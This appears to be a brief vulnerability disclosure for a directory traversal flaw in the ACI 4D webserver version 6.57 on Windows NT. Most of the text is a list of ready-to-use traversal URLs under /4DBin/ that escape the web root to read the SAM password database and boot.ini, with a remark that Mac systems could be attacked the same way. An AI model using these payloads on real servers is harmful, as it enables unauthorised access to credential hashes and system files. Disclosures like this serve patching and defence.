vendor: http://www.4d.com/ current version: 6.7 tested version: 6.57 , others?
This directory transversal hole seems to work on ACI 4d webserver running on the NT platform. I would imagine exploitation on a macos box would be similar but would require the proper mac filesystem path to the file you wish to view.
Http://host + one of the following urls.
/4DBin//C:/winnt/repair/sam. /4DBin//../winnt/repair/sam. /4DBin//C:/inetpub/../boot.ini /4DBin//../boot.ini /4DBin/_/../inetpub/../boot.ini